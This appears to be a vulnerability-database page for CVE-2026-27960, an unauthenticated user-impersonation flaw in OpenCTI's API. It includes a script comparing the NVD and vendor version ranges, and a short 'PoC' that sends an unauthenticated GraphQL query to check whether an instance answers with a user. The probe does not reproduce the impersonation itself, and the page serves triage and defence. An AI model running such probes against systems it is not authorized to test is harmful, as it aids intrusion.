Security Vulnerability Report
CVE-2026-27960 CVSS 9.8 CRITICAL

Published: 2026-05-05 19:16:21
Last Modified: 2026-05-12 13:45:08

Description

OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. In versions 6.6.0 through 6.9.12, there is a privilege escalation vulnerability that can be exploited by unauthenticated attackers to query the API as any existing user, including the default admin account. This issue has been fixed in version 6.9.13. As a workaround, the default admin can be disabled using the `APP__ADMIN__EXTERNALLY_MANAGED` configuration.

Weakness classification (NVD): CWE-287, Improper Authentication. Note that the workaround only removes the default admin account as a target; since the description states that any existing user can be impersonated, upgrading to 6.9.13 is the actual fix.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:* - VULNERABLE
NVD CPE match range: versions from 6.9.0 (inclusive) up to, but excluding, 6.9.13 (match criteria 33B3585F-A14B-421D-88EC-1F075332CBA7).

Note that the vendor description above gives a wider affected range, 6.6.0 through 6.9.12, while the NVD match criteria only cover the 6.9.x releases. Version-matching tooling keyed on the CPE data alone will therefore not flag 6.6.x through 6.8.x installations. Example versions within the described range:
OpenCTI 6.6.0
OpenCTI 6.6.1
OpenCTI 6.7.0
OpenCTI 6.8.0
OpenCTI 6.9.0
OpenCTI 6.9.12
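The NVD match criteria and the vendor description disagree on the lower bound of the affected range. The block below is an added example, not part of the NVD record or of OpenCTI: it applies the cpeMatch version bounds copied from this page's Raw JSON to a concrete version string, next to the 6.6.0 through 6.9.12 range from the description, so the gap is visible directly. The version parsing and the handling of only plain OR nodes are this example's own simplifications of the NVD configuration format.

```python
import json

# Copy of the NVD "configurations" node from the Raw JSON on this page.
NVD_CONFIGURATIONS = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true,
  "criteria": "cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:*",
  "versionStartIncluding": "6.9.0", "versionEndExcluding": "6.9.13",
  "matchCriteriaId": "33B3585F-A14B-421D-88EC-1F075332CBA7"}]}]}]
""")

# Affected range stated in the vendor description on this page.
DESCRIBED_RANGE = ("6.6.0", "6.9.12")


def parse_version(v: str) -> tuple:
    """'6.9.12' -> (6, 9, 12). Pre-release / build suffixes ('-rc1', '+abc')
    are dropped; this example does not model full semver precedence."""
    core = v.split("-", 1)[0].split("+", 1)[0]
    return tuple(int(part) for part in core.split("."))


def cpe_match_applies(match: dict, version: str) -> bool:
    """Apply one NVD cpeMatch entry's version bounds to a concrete version.
    All four NVD bound keys are honoured; absent keys impose no constraint."""
    v = parse_version(version)
    checks = (
        ("versionStartIncluding", lambda bound: v >= bound),
        ("versionStartExcluding", lambda bound: v > bound),
        ("versionEndIncluding", lambda bound: v <= bound),
        ("versionEndExcluding", lambda bound: v < bound),
    )
    for key, ok in checks:
        if key in match and not ok(parse_version(match[key])):
            return False
    return bool(match.get("vulnerable", False))


def affected_per_nvd(version: str, configurations=NVD_CONFIGURATIONS) -> bool:
    """True if any vulnerable cpeMatch in the configurations covers the version.
    Only the plain OR nodes used in this record are handled; AND or negated
    nodes raise rather than silently return a wrong answer."""
    for config in configurations:
        for node in config["nodes"]:
            if node.get("operator") != "OR" or node.get("negate"):
                raise NotImplementedError("only plain OR nodes are handled")
            if any(cpe_match_applies(m, version) for m in node["cpeMatch"]):
                return True
    return False


def affected_per_description(version: str) -> bool:
    """Inclusive range check against the vendor-described 6.6.0..6.9.12."""
    lo, hi = (parse_version(b) for b in DESCRIBED_RANGE)
    return lo <= parse_version(version) <= hi


def compare(version: str) -> dict:
    """Side-by-side verdict for one version string."""
    return {"version": version,
            "nvd_cpe": affected_per_nvd(version),
            "vendor_description": affected_per_description(version)}


if __name__ == "__main__":
    for v in ("6.5.9", "6.6.0", "6.8.0", "6.9.0", "6.9.12", "6.9.13"):
        print(compare(v))
```

Running it shows 6.6.0 through 6.8.x as affected per the description but not per the NVD CPE data, and 6.9.13 as clean under both. When triaging an inventory against this CVE, match on the description's range (or on the vendor advisory) rather than on the CPE node alone.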

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# OpenCTI GraphQL endpoint. Replace with the actual target URL.
target_url = "http://localhost:4000/graphql"

# The vulnerability allows unauthenticated users to query the API
# as any existing user (e.g., admin) due to improper access control.
# This script only sends an unauthenticated `me` query, which a patched
# instance should reject; it does not reproduce the impersonation mechanism
# itself (see the vendor advisory GHSA-6vvv-vmfr-xhrx). Field names must
# match the target's GraphQL schema.
query = """
query {
  me {
    id
    name
    email
    role {
      name
    }
  }
}
"""

headers = {"Content-Type": "application/json"}

try:
    response = requests.post(target_url, json={"query": query}, headers=headers, timeout=10)
    response.raise_for_status()
    body = response.json()
    # GraphQL servers normally answer HTTP 200 even when the query is rejected
    # (the rejection arrives in the "errors" array), so a 200 alone proves
    # nothing. The anomaly is an unauthenticated request that gets back a
    # populated `me` object with no errors.
    if (body.get("data") or {}).get("me") and not body.get("errors"):
        print("[+] Unauthenticated `me` query resolved to a user:")
        print("[+] Response:", body)
    else:
        print("[-] Query rejected or not vulnerable.")
        print("[-] Errors:", body.get("errors"))
except requests.exceptions.RequestException as e:
    print(f"[!] Request error: {e}")
except ValueError as e:
    print(f"[!] Non-JSON response: {e}")
```

References

https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-6vvv-vmfr-xhrx (Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27960", "sourceIdentifier": "[email protected]", "published": "2026-05-05T19:16:21.380", "lastModified": "2026-05-12T13:45:07.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. In versions 6.6.0 through 6.9.12, there is a privilege escalation vulnerability that can be exploited by unauthenticated attackers to query the API as any existing user, including the default admin account. This issue has been fixed in version 6.9.13. As a workaround, the default admin can be disabled using the `APP__ADMIN__EXTERNALLY_MANAGED` configuration."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.9.0", "versionEndExcluding": "6.9.13", "matchCriteriaId": "33B3585F-A14B-421D-88EC-1F075332CBA7"}]}]}], "references": [{"url": "https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-6vvv-vmfr-xhrx", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}